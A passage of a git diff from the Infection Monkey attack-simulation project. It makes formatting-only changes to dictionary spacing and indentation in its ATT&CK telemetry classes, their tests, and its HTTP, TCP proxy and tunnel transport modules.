+++ b/monkey/infection_monkey/telemetry/attack/t1064_telem.py
@@ -3,7 +3,8 @@ from infection_monkey.telemetry.attack.usage_telem import AttackTelem
class T1064Telem(AttackTelem):
def __init__(self, status, usage):
- # TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem techniques
+ # TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem
+ # techniques
"""
T1064 telemetry.
:param status: ScanStatus of technique
@@ -14,5 +15,5 @@ class T1064Telem(AttackTelem):
def get_data(self):
data = super(T1064Telem, self).get_data()
- data.update({"usage": self.usage})
+ data.update({"usage":self.usage})
return data
diff --git a/monkey/infection_monkey/telemetry/attack/t1105_telem.py b/monkey/infection_monkey/telemetry/attack/t1105_telem.py
index 939e2b3e2..d75a527d9 100644
--- a/monkey/infection_monkey/telemetry/attack/t1105_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/t1105_telem.py
@@ -17,5 +17,5 @@ class T1105Telem(AttackTelem):
def get_data(self):
data = super(T1105Telem, self).get_data()
- data.update({"filename": self.filename, "src": self.src, "dst": self.dst})
+ data.update({"filename":self.filename, "src":self.src, "dst":self.dst})
return data
diff --git a/monkey/infection_monkey/telemetry/attack/t1107_telem.py b/monkey/infection_monkey/telemetry/attack/t1107_telem.py
index 816488f3b..ced66a4c1 100644
--- a/monkey/infection_monkey/telemetry/attack/t1107_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/t1107_telem.py
@@ -13,5 +13,5 @@ class T1107Telem(AttackTelem):
def get_data(self):
data = super(T1107Telem, self).get_data()
- data.update({"path": self.path})
+ data.update({"path":self.path})
return data
diff --git a/monkey/infection_monkey/telemetry/attack/t1197_telem.py b/monkey/infection_monkey/telemetry/attack/t1197_telem.py
index c5c98a9d0..5e12fc718 100644
--- a/monkey/infection_monkey/telemetry/attack/t1197_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/t1197_telem.py
@@ -5,7 +5,8 @@ __author__ = "itay.mizeretz"
class T1197Telem(VictimHostTelem):
def __init__(self, status, machine, usage):
- # TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem techniques
+ # TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem
+ # techniques
"""
T1197 telemetry.
:param status: ScanStatus of technique
@@ -17,5 +18,5 @@ class T1197Telem(VictimHostTelem):
def get_data(self):
data = super(T1197Telem, self).get_data()
- data.update({"usage": self.usage})
+ data.update({"usage":self.usage})
return data
diff --git a/monkey/infection_monkey/telemetry/attack/t1222_telem.py b/monkey/infection_monkey/telemetry/attack/t1222_telem.py
index 30a0314ae..4f65d1401 100644
--- a/monkey/infection_monkey/telemetry/attack/t1222_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/t1222_telem.py
@@ -14,5 +14,5 @@ class T1222Telem(VictimHostTelem):
def get_data(self):
data = super(T1222Telem, self).get_data()
- data.update({"command": self.command})
+ data.update({"command":self.command})
return data
diff --git a/monkey/infection_monkey/telemetry/attack/usage_telem.py b/monkey/infection_monkey/telemetry/attack/usage_telem.py
index 3066fe3d3..1231215e5 100644
--- a/monkey/infection_monkey/telemetry/attack/usage_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/usage_telem.py
@@ -13,5 +13,5 @@ class UsageTelem(AttackTelem):
def get_data(self):
data = super(UsageTelem, self).get_data()
- data.update({"usage": self.usage})
+ data.update({"usage":self.usage})
return data
diff --git a/monkey/infection_monkey/telemetry/attack/victim_host_telem.py b/monkey/infection_monkey/telemetry/attack/victim_host_telem.py
index 9dc812b14..19c3740ff 100644
--- a/monkey/infection_monkey/telemetry/attack/victim_host_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/victim_host_telem.py
@@ -13,9 +13,9 @@ class VictimHostTelem(AttackTelem):
:param machine: VictimHost obj from model/host.py
"""
super(VictimHostTelem, self).__init__(technique, status)
- self.machine = {"domain_name": machine.domain_name, "ip_addr": machine.ip_addr}
+ self.machine = {"domain_name":machine.domain_name, "ip_addr":machine.ip_addr}
def get_data(self):
data = super(VictimHostTelem, self).get_data()
- data.update({"machine": self.machine})
+ data.update({"machine":self.machine})
return data
diff --git a/monkey/infection_monkey/telemetry/base_telem.py b/monkey/infection_monkey/telemetry/base_telem.py
index e179a24df..0fcf4b203 100644
--- a/monkey/infection_monkey/telemetry/base_telem.py
+++ b/monkey/infection_monkey/telemetry/base_telem.py
@@ -9,6 +9,7 @@ LOGGED_DATA_LENGTH = 300 # How many characters of telemetry data will be logged
__author__ = "itay.mizeretz"
+
# TODO: Rework the interface for telemetry; this class has too many responsibilities
# (i.e. too many reasons to change):
#
diff --git a/monkey/infection_monkey/telemetry/exploit_telem.py b/monkey/infection_monkey/telemetry/exploit_telem.py
index 4f39a2145..9b2e6c2f6 100644
--- a/monkey/infection_monkey/telemetry/exploit_telem.py
+++ b/monkey/infection_monkey/telemetry/exploit_telem.py
@@ -19,9 +19,9 @@ class ExploitTelem(BaseTelem):
def get_data(self):
return {
- "result": self.result,
- "machine": self.exploiter.host.__dict__,
- "exploiter": self.exploiter.__class__.__name__,
- "info": self.exploiter.exploit_info,
- "attempts": self.exploiter.exploit_attempts,
+ "result":self.result,
+ "machine":self.exploiter.host.__dict__,
+ "exploiter":self.exploiter.__class__.__name__,
+ "info":self.exploiter.exploit_info,
+ "attempts":self.exploiter.exploit_attempts,
}
diff --git a/monkey/infection_monkey/telemetry/post_breach_telem.py b/monkey/infection_monkey/telemetry/post_breach_telem.py
index 6dafa3c0c..f1e8f6101 100644
--- a/monkey/infection_monkey/telemetry/post_breach_telem.py
+++ b/monkey/infection_monkey/telemetry/post_breach_telem.py
@@ -22,11 +22,11 @@ class PostBreachTelem(BaseTelem):
def get_data(self):
return {
- "command": self.pba.command,
- "result": self.result,
- "name": self.pba.name,
- "hostname": self.hostname,
- "ip": self.ip,
+ "command":self.pba.command,
+ "result":self.result,
+ "name":self.pba.name,
+ "hostname":self.hostname,
+ "ip":self.ip,
}
@staticmethod
diff --git a/monkey/infection_monkey/telemetry/scan_telem.py b/monkey/infection_monkey/telemetry/scan_telem.py
index c606a2cc2..ea7ee8723 100644
--- a/monkey/infection_monkey/telemetry/scan_telem.py
+++ b/monkey/infection_monkey/telemetry/scan_telem.py
@@ -16,4 +16,4 @@ class ScanTelem(BaseTelem):
telem_category = TelemCategoryEnum.SCAN
def get_data(self):
- return {"machine": self.machine.as_dict(), "service_count": len(self.machine.services)}
+ return {"machine":self.machine.as_dict(), "service_count":len(self.machine.services)}
diff --git a/monkey/infection_monkey/telemetry/scoutsuite_telem.py b/monkey/infection_monkey/telemetry/scoutsuite_telem.py
index 91b26f69d..7a31b8332 100644
--- a/monkey/infection_monkey/telemetry/scoutsuite_telem.py
+++ b/monkey/infection_monkey/telemetry/scoutsuite_telem.py
@@ -14,4 +14,4 @@ class ScoutSuiteTelem(BaseTelem):
telem_category = TelemCategoryEnum.SCOUTSUITE
def get_data(self):
- return {"data": self.provider_data}
+ return {"data":self.provider_data}
diff --git a/monkey/infection_monkey/telemetry/state_telem.py b/monkey/infection_monkey/telemetry/state_telem.py
index 06fc1794c..a5b8ad66a 100644
--- a/monkey/infection_monkey/telemetry/state_telem.py
+++ b/monkey/infection_monkey/telemetry/state_telem.py
@@ -17,4 +17,4 @@ class StateTelem(BaseTelem):
telem_category = TelemCategoryEnum.STATE
def get_data(self):
- return {"done": self.is_done, "version": self.version}
+ return {"done":self.is_done, "version":self.version}
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_attack_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_attack_telem.py
index 02d591f3e..1025ae871 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_attack_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_attack_telem.py
@@ -16,7 +16,7 @@ def attack_telem_test_instance():
def test_attack_telem_send(attack_telem_test_instance, spy_send_telemetry):
attack_telem_test_instance.send()
- expected_data = {"status": STATUS.value, "technique": TECHNIQUE}
+ expected_data = {"status":STATUS.value, "technique":TECHNIQUE}
expected_data = json.dumps(expected_data, cls=attack_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1005_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1005_telem.py
index 7ad7e074c..9bcda631d 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1005_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1005_telem.py
@@ -18,10 +18,10 @@ def T1005_telem_test_instance():
def test_T1005_send(T1005_telem_test_instance, spy_send_telemetry):
T1005_telem_test_instance.send()
expected_data = {
- "status": STATUS.value,
- "technique": "T1005",
- "gathered_data_type": GATHERED_DATA_TYPE,
- "info": INFO,
+ "status":STATUS.value,
+ "technique":"T1005",
+ "gathered_data_type":GATHERED_DATA_TYPE,
+ "info":INFO,
}
expected_data = json.dumps(expected_data, cls=T1005_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1035_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1035_telem.py
index f927e7b91..3e91417a4 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1035_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1035_telem.py
@@ -16,7 +16,7 @@ def T1035_telem_test_instance():
def test_T1035_send(T1035_telem_test_instance, spy_send_telemetry):
T1035_telem_test_instance.send()
- expected_data = {"status": STATUS.value, "technique": "T1035", "usage": USAGE.name}
+ expected_data = {"status":STATUS.value, "technique":"T1035", "usage":USAGE.name}
expected_data = json.dumps(expected_data, cls=T1035_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1064_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1064_telem.py
index 1d242d4ef..afcae8fce 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1064_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1064_telem.py
@@ -16,7 +16,7 @@ def T1064_telem_test_instance():
def test_T1064_send(T1064_telem_test_instance, spy_send_telemetry):
T1064_telem_test_instance.send()
- expected_data = {"status": STATUS.value, "technique": "T1064", "usage": USAGE_STR}
+ expected_data = {"status":STATUS.value, "technique":"T1064", "usage":USAGE_STR}
expected_data = json.dumps(expected_data, cls=T1064_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1105_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1105_telem.py
index 690c4508c..52c512aa2 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1105_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1105_telem.py
@@ -19,11 +19,11 @@ def T1105_telem_test_instance():
def test_T1105_send(T1105_telem_test_instance, spy_send_telemetry):
T1105_telem_test_instance.send()
expected_data = {
- "status": STATUS.value,
- "technique": "T1105",
- "filename": FILENAME,
- "src": SRC_IP,
- "dst": DST_IP,
+ "status":STATUS.value,
+ "technique":"T1105",
+ "filename":FILENAME,
+ "src":SRC_IP,
+ "dst":DST_IP,
}
expected_data = json.dumps(expected_data, cls=T1105_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1106_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1106_telem.py
index 2857bbc11..31640666a 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1106_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1106_telem.py
@@ -16,7 +16,7 @@ def T1106_telem_test_instance():
def test_T1106_send(T1106_telem_test_instance, spy_send_telemetry):
T1106_telem_test_instance.send()
- expected_data = {"status": STATUS.value, "technique": "T1106", "usage": USAGE.name}
+ expected_data = {"status":STATUS.value, "technique":"T1106", "usage":USAGE.name}
expected_data = json.dumps(expected_data, cls=T1106_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1107_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1107_telem.py
index bb1bf2088..2729ed659 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1107_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1107_telem.py
@@ -16,7 +16,7 @@ def T1107_telem_test_instance():
def test_T1107_send(T1107_telem_test_instance, spy_send_telemetry):
T1107_telem_test_instance.send()
- expected_data = {"status": STATUS.value, "technique": "T1107", "path": PATH}
+ expected_data = {"status":STATUS.value, "technique":"T1107", "path":PATH}
expected_data = json.dumps(expected_data, cls=T1107_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1129_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1129_telem.py
index 41178a749..0818ed195 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1129_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1129_telem.py
@@ -16,7 +16,7 @@ def T1129_telem_test_instance():
def test_T1129_send(T1129_telem_test_instance, spy_send_telemetry):
T1129_telem_test_instance.send()
- expected_data = {"status": STATUS.value, "technique": "T1129", "usage": USAGE.name}
+ expected_data = {"status":STATUS.value, "technique":"T1129", "usage":USAGE.name}
expected_data = json.dumps(expected_data, cls=T1129_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1197_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1197_telem.py
index a7556e952..bdf3b9e73 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1197_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1197_telem.py
@@ -21,10 +21,10 @@ def T1197_telem_test_instance():
def test_T1197_send(T1197_telem_test_instance, spy_send_telemetry):
T1197_telem_test_instance.send()
expected_data = {
- "status": STATUS.value,
- "technique": "T1197",
- "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
- "usage": USAGE_STR,
+ "status":STATUS.value,
+ "technique":"T1197",
+ "machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP},
+ "usage":USAGE_STR,
}
expected_data = json.dumps(expected_data, cls=T1197_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1222_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1222_telem.py
index 1b78bef5b..62724f916 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1222_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1222_telem.py
@@ -21,10 +21,10 @@ def T1222_telem_test_instance():
def test_T1222_send(T1222_telem_test_instance, spy_send_telemetry):
T1222_telem_test_instance.send()
expected_data = {
- "status": STATUS.value,
- "technique": "T1222",
- "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
- "command": COMMAND,
+ "status":STATUS.value,
+ "technique":"T1222",
+ "machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP},
+ "command":COMMAND,
}
expected_data = json.dumps(expected_data, cls=T1222_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_usage_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_usage_telem.py
index 511cc51b8..97e0dc801 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_usage_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_usage_telem.py
@@ -18,9 +18,9 @@ def usage_telem_test_instance():
def test_usage_telem_send(usage_telem_test_instance, spy_send_telemetry):
usage_telem_test_instance.send()
expected_data = {
- "status": STATUS.value,
- "technique": TECHNIQUE,
- "usage": USAGE.name,
+ "status":STATUS.value,
+ "technique":TECHNIQUE,
+ "usage":USAGE.name,
}
expected_data = json.dumps(expected_data, cls=usage_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py
index a3853e78c..0344c6478 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py
@@ -21,9 +21,9 @@ def victim_host_telem_test_instance():
def test_victim_host_telem_send(victim_host_telem_test_instance, spy_send_telemetry):
victim_host_telem_test_instance.send()
expected_data = {
- "status": STATUS.value,
- "technique": TECHNIQUE,
- "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
+ "status":STATUS.value,
+ "technique":TECHNIQUE,
+ "machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP},
}
expected_data = json.dumps(expected_data, cls=victim_host_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/test_exploit_telem.py b/monkey/infection_monkey/telemetry/tests/test_exploit_telem.py
index 95f853922..373dece4a 100644
--- a/monkey/infection_monkey/telemetry/tests/test_exploit_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/test_exploit_telem.py
@@ -10,24 +10,24 @@ DOMAIN_NAME = "domain-name"
IP = "0.0.0.0"
HOST = VictimHost(IP, DOMAIN_NAME)
HOST_AS_DICT = {
- "ip_addr": IP,
- "domain_name": DOMAIN_NAME,
- "os": {},
- "services": {},
- "icmp": False,
- "monkey_exe": None,
- "default_tunnel": None,
- "default_server": None,
+ "ip_addr":IP,
+ "domain_name":DOMAIN_NAME,
+ "os":{},
+ "services":{},
+ "icmp":False,
+ "monkey_exe":None,
+ "default_tunnel":None,
+ "default_server":None,
}
EXPLOITER = WmiExploiter(HOST)
EXPLOITER_NAME = "WmiExploiter"
EXPLOITER_INFO = {
- "display_name": WmiExploiter._EXPLOITED_SERVICE,
- "started": "",
- "finished": "",
- "vulnerable_urls": [],
- "vulnerable_ports": [],
- "executed_cmds": [],
+ "display_name":WmiExploiter._EXPLOITED_SERVICE,
+ "started":"",
+ "finished":"",
+ "vulnerable_urls":[],
+ "vulnerable_ports":[],
+ "executed_cmds":[],
}
EXPLOITER_ATTEMPTS = []
RESULT = False
@@ -41,11 +41,11 @@ def exploit_telem_test_instance():
def test_exploit_telem_send(exploit_telem_test_instance, spy_send_telemetry):
exploit_telem_test_instance.send()
expected_data = {
- "result": RESULT,
- "machine": HOST_AS_DICT,
- "exploiter": EXPLOITER_NAME,
- "info": EXPLOITER_INFO,
- "attempts": EXPLOITER_ATTEMPTS,
+ "result":RESULT,
+ "machine":HOST_AS_DICT,
+ "exploiter":EXPLOITER_NAME,
+ "info":EXPLOITER_INFO,
+ "attempts":EXPLOITER_ATTEMPTS,
}
expected_data = json.dumps(expected_data, cls=exploit_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/test_post_breach_telem.py b/monkey/infection_monkey/telemetry/tests/test_post_breach_telem.py
index d6ce48825..3a6d1b31d 100644
--- a/monkey/infection_monkey/telemetry/tests/test_post_breach_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/test_post_breach_telem.py
@@ -20,18 +20,18 @@ class StubSomePBA:
@pytest.fixture
def post_breach_telem_test_instance(monkeypatch):
PBA = StubSomePBA()
- monkeypatch.setattr(PostBreachTelem, "_get_hostname_and_ip", lambda: (HOSTNAME, IP))
+ monkeypatch.setattr(PostBreachTelem, "_get_hostname_and_ip", lambda:(HOSTNAME, IP))
return PostBreachTelem(PBA, RESULT)
def test_post_breach_telem_send(post_breach_telem_test_instance, spy_send_telemetry):
post_breach_telem_test_instance.send()
expected_data = {
- "command": PBA_COMMAND,
- "result": RESULT,
- "name": PBA_NAME,
- "hostname": HOSTNAME,
- "ip": IP,
+ "command":PBA_COMMAND,
+ "result":RESULT,
+ "name":PBA_NAME,
+ "hostname":HOSTNAME,
+ "ip":IP,
}
expected_data = json.dumps(expected_data, cls=post_breach_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/test_scan_telem.py b/monkey/infection_monkey/telemetry/tests/test_scan_telem.py
index 07c6fbf41..ffb2dbf8b 100644
--- a/monkey/infection_monkey/telemetry/tests/test_scan_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/test_scan_telem.py
@@ -9,14 +9,14 @@ DOMAIN_NAME = "domain-name"
IP = "0.0.0.0"
HOST = VictimHost(IP, DOMAIN_NAME)
HOST_AS_DICT = {
- "ip_addr": IP,
- "domain_name": DOMAIN_NAME,
- "os": {},
- "services": {},
- "icmp": False,
- "monkey_exe": None,
- "default_tunnel": None,
- "default_server": None,
+ "ip_addr":IP,
+ "domain_name":DOMAIN_NAME,
+ "os":{},
+ "services":{},
+ "icmp":False,
+ "monkey_exe":None,
+ "default_tunnel":None,
+ "default_server":None,
}
HOST_SERVICES = {}
@@ -28,7 +28,7 @@ def scan_telem_test_instance():
def test_scan_telem_send(scan_telem_test_instance, spy_send_telemetry):
scan_telem_test_instance.send()
- expected_data = {"machine": HOST_AS_DICT, "service_count": len(HOST_SERVICES)}
+ expected_data = {"machine":HOST_AS_DICT, "service_count":len(HOST_SERVICES)}
expected_data = json.dumps(expected_data, cls=scan_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/test_state_telem.py b/monkey/infection_monkey/telemetry/tests/test_state_telem.py
index 18776f987..fa67301e2 100644
--- a/monkey/infection_monkey/telemetry/tests/test_state_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/test_state_telem.py
@@ -15,7 +15,7 @@ def state_telem_test_instance():
def test_state_telem_send(state_telem_test_instance, spy_send_telemetry):
state_telem_test_instance.send()
- expected_data = {"done": IS_DONE, "version": VERSION}
+ expected_data = {"done":IS_DONE, "version":VERSION}
expected_data = json.dumps(expected_data, cls=state_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/test_trace_telem.py b/monkey/infection_monkey/telemetry/tests/test_trace_telem.py
index 0c4027a05..c1f91e165 100644
--- a/monkey/infection_monkey/telemetry/tests/test_trace_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/test_trace_telem.py
@@ -14,7 +14,7 @@ def trace_telem_test_instance():
def test_trace_telem_send(trace_telem_test_instance, spy_send_telemetry):
trace_telem_test_instance.send()
- expected_data = {"msg": MSG}
+ expected_data = {"msg":MSG}
expected_data = json.dumps(expected_data, cls=trace_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/test_tunnel_telem.py b/monkey/infection_monkey/telemetry/tests/test_tunnel_telem.py
index eab763790..a13a929ce 100644
--- a/monkey/infection_monkey/telemetry/tests/test_tunnel_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/test_tunnel_telem.py
@@ -12,7 +12,7 @@ def tunnel_telem_test_instance():
def test_tunnel_telem_send(tunnel_telem_test_instance, spy_send_telemetry):
tunnel_telem_test_instance.send()
- expected_data = {"proxy": None}
+ expected_data = {"proxy":None}
expected_data = json.dumps(expected_data, cls=tunnel_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/trace_telem.py b/monkey/infection_monkey/telemetry/trace_telem.py
index 8beec1181..db59f0169 100644
--- a/monkey/infection_monkey/telemetry/trace_telem.py
+++ b/monkey/infection_monkey/telemetry/trace_telem.py
@@ -21,4 +21,4 @@ class TraceTelem(BaseTelem):
telem_category = TelemCategoryEnum.TRACE
def get_data(self):
- return {"msg": self.msg}
+ return {"msg":self.msg}
diff --git a/monkey/infection_monkey/telemetry/tunnel_telem.py b/monkey/infection_monkey/telemetry/tunnel_telem.py
index 05f057ee9..45ef0b176 100644
--- a/monkey/infection_monkey/telemetry/tunnel_telem.py
+++ b/monkey/infection_monkey/telemetry/tunnel_telem.py
@@ -16,4 +16,4 @@ class TunnelTelem(BaseTelem):
telem_category = TelemCategoryEnum.TUNNEL
def get_data(self):
- return {"proxy": self.proxy}
+ return {"proxy":self.proxy}
diff --git a/monkey/infection_monkey/transport/http.py b/monkey/infection_monkey/transport/http.py
index e2b3a69da..d33acfc0a 100644
--- a/monkey/infection_monkey/transport/http.py
+++ b/monkey/infection_monkey/transport/http.py
@@ -99,8 +99,8 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
self.send_header("Content-type", "application/octet-stream")
self.send_header(
- "Content-Range",
- "bytes " + str(start_range) + "-" + str(end_range - 1) + "/" + str(size),
+ "Content-Range",
+ "bytes " + str(start_range) + "-" + str(end_range - 1) + "/" + str(size),
)
self.send_header("Content-Length", min(end_range - start_range, size))
self.end_headers()
@@ -108,8 +108,8 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
def log_message(self, format_string, *args):
LOG.debug(
- "FileServHTTPRequestHandler: %s - - [%s] %s"
- % (self.address_string(), self.log_date_time_string(), format_string % args)
+ "FileServHTTPRequestHandler: %s - - [%s] %s"
+ % (self.address_string(), self.log_date_time_string(), format_string % args)
)
@@ -127,11 +127,11 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler):
try:
dest_path = self.path
r = requests.post(
- url=dest_path,
- data=post_data,
- verify=False,
- proxies=infection_monkey.control.ControlClient.proxies,
- timeout=SHORT_REQUEST_TIMEOUT,
+ url=dest_path,
+ data=post_data,
+ verify=False,
+ proxies=infection_monkey.control.ControlClient.proxies,
+ timeout=SHORT_REQUEST_TIMEOUT,
)
self.send_response(r.status_code)
except requests.exceptions.ConnectionError as e:
@@ -160,8 +160,8 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler):
conn = socket.create_connection(address)
except socket.error as e:
LOG.debug(
- "HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s"
- % (repr(address), e)
+ "HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s"
+ % (repr(address), e)
)
self.send_error(504) # 504 Gateway Timeout
return
@@ -187,8 +187,8 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler):
def log_message(self, format_string, *args):
LOG.debug(
- "HTTPConnectProxyHandler: %s - [%s] %s"
- % (self.address_string(), self.log_date_time_string(), format_string % args)
+ "HTTPConnectProxyHandler: %s - [%s] %s"
+ % (self.address_string(), self.log_date_time_string(), format_string % args)
)
@@ -213,10 +213,10 @@ class HTTPServer(threading.Thread):
def report_download(dest=None):
LOG.info("File downloaded from (%s,%s)" % (dest[0], dest[1]))
TempHandler.T1105Telem(
- TempHandler.ScanStatus.USED,
- get_interface_to_target(dest[0]),
- dest[0],
- self._filename,
+ TempHandler.ScanStatus.USED,
+ get_interface_to_target(dest[0]),
+ dest[0],
+ self._filename,
).send()
self.downloads += 1
if not self.downloads < self.max_downloads:
@@ -270,10 +270,10 @@ class LockedHTTPServer(threading.Thread):
def report_download(dest=None):
LOG.info("File downloaded from (%s,%s)" % (dest[0], dest[1]))
TempHandler.T1105Telem(
- TempHandler.ScanStatus.USED,
- get_interface_to_target(dest[0]),
- dest[0],
- self._filename,
+ TempHandler.ScanStatus.USED,
+ get_interface_to_target(dest[0]),
+ dest[0],
+ self._filename,
).send()
self.downloads += 1
if not self.downloads < self.max_downloads:
diff --git a/monkey/infection_monkey/transport/tcp.py b/monkey/infection_monkey/transport/tcp.py
index 60a995edc..6c79e5cd2 100644
--- a/monkey/infection_monkey/transport/tcp.py
+++ b/monkey/infection_monkey/transport/tcp.py
@@ -71,11 +71,11 @@ class TcpProxy(TransportProxyBase):
pipe = SocketsPipe(source, dest)
pipes.append(pipe)
LOG.debug(
- "piping sockets %s:%s->%s:%s",
- address[0],
- address[1],
- self.dest_host,
- self.dest_port,
+ "piping sockets %s:%s->%s:%s",
+ address[0],
+ address[1],
+ self.dest_host,
+ self.dest_port,
)
pipe.start()
diff --git a/monkey/infection_monkey/tunnel.py b/monkey/infection_monkey/tunnel.py
index 83e03fec2..ecfd313d7 100644
--- a/monkey/infection_monkey/tunnel.py
+++ b/monkey/infection_monkey/tunnel.py
@@ -27,9 +27,9 @@ def _set_multicast_socket(timeout=DEFAULT_TIMEOUT, adapter=""):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((adapter, MCAST_PORT))
sock.setsockopt(
- socket.IPPROTO_IP,
- socket.IP_ADD_MEMBERSHIP,
- struct.pack("4sl", socket.inet_aton(MCAST_GROUP), socket.INADDR_ANY),
+ socket.IPPROTO_IP,
+ socket.IP_ADD_MEMBERSHIP,
+ struct.pack("4sl", socket.inet_aton(MCAST_GROUP), socket.INADDR_ANY),
)
return sock
@@ -138,14 +138,14 @@ class MonkeyTunnel(Thread):
return
proxy = self._proxy_class(
- local_port=self.local_port, dest_host=self._target_addr, dest_port=self._target_port
+ local_port=self.local_port, dest_host=self._target_addr, dest_port=self._target_port
)
LOG.info(
- "Running tunnel using proxy class: %s, listening on port %s, routing to: %s:%s",
- proxy.__class__.__name__,
- self.local_port,
- self._target_addr,
- self._target_port,
+ "Running tunnel using proxy class: %s, listening on port %s, routing to: %s:%s",
+ proxy.__class__.__name__,
+ self.local_port,
+ self._target_addr,
+ self._target_port,
)
proxy.start()
@@ -157,7 +157,7 @@ class MonkeyTunnel(Thread):
if ip_match:
